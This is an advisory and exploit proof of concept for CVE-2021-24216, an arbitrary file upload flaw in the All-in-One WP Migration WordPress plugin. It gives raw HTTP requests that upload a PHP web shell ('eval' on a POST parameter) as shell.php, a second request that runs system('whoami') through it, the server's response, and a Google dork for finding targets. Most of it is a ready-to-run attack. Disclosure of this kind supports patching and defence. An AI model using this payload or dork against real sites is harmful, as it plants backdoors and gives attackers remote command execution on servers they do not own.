All-in-One WP Migration < 7.41 – Admin+ Arbitrary File Upload to RCE | CVE 2021-24216

Description

The plugin does not validate uploaded files' extension, which allows administrators to upload PHP files on their site, even on multisite installations.

Proof of Concept

To reproduce:
- Log in, Click all in one WP migration import to use the import from file function.
- Intercept wp-admin/admin- ajax.php?action=ai1wm_ import&ai1wm_ Import = 1 request.
- Change the parameters of “upload-file”, “storage” and “archive”. Insert malicious PHP code into “upload-file”. Submit the request.
- Access the URL under to execute system commands: wp-content/plugins/all-in-one-wp-migration/storage/[storage]/[archive]

# Exploit Title:  WordPress All-in-One WP Migration Plugin - Arbitrary File Upload to Remote Code Execution
# Google Dork: inurl:/wp-admin/admin-ajax.php
# Date: 23/12/2020
# Exploit Author: YICHENGLIU_chenfeng lab
# Vendor Homepage: https://cn.wordpress.org/plugins/all-in-one-wp-migration/advanced/
# Version: All-in-One WP Migration <=7.38
# Tested on: windows 10(x64)
# data in http request :


POST example/wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm_import=1 HTTP/1.1
Host: 192.168.9.240
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.9.240/WordPresscn/wp-admin/admin.php?page=ai1wm_import
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3937767834299093780715813797
Content-Length: 740
Origin: http://192.168.9.240
Connection: close
Cookie: wordpress_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Caeb6bc83b040df5b4acfbbaf7a18681cb06c3210046627978bad64d8419f06e6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Cc6d2ef5724f21ca0e0cc446643f6f8d68c900452b87b412b2eb7282c32161846; wp-settings-time-1=1616143799

-----------------------------3937767834299093780715813797
Content-Disposition: form-data; name="upload-file"; filename="shell.wpress"
Content-Type: application/octet-stream

<?php eval($_POST['c']);
-----------------------------3937767834299093780715813797
Content-Disposition: form-data; name="priority"

5
-----------------------------3937767834299093780715813797
Content-Disposition: form-data; name="secret_key"

7wD1bP6YC4xB
-----------------------------3937767834299093780715813797
Content-Disposition: form-data; name="storage"

shell
-----------------------------3937767834299093780715813797
Content-Disposition: form-data; name="archive"

shell.php
-----------------------------3937767834299093780715813797--

##########################
execute shell
##########################
POST /wordpresscn/wp-content/plugins/all-in-one-wp-migration/storage/shell/shell.php HTTP/1.1
Host: 192.168.9.240
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

c=system('whoami');

###########################
Execute response
###########################
HTTP/1.1 200 OK
Date: Fri, 19 Mar 2021 09:00:56 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.27
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1124

desktop-psag0ka\gongfang-9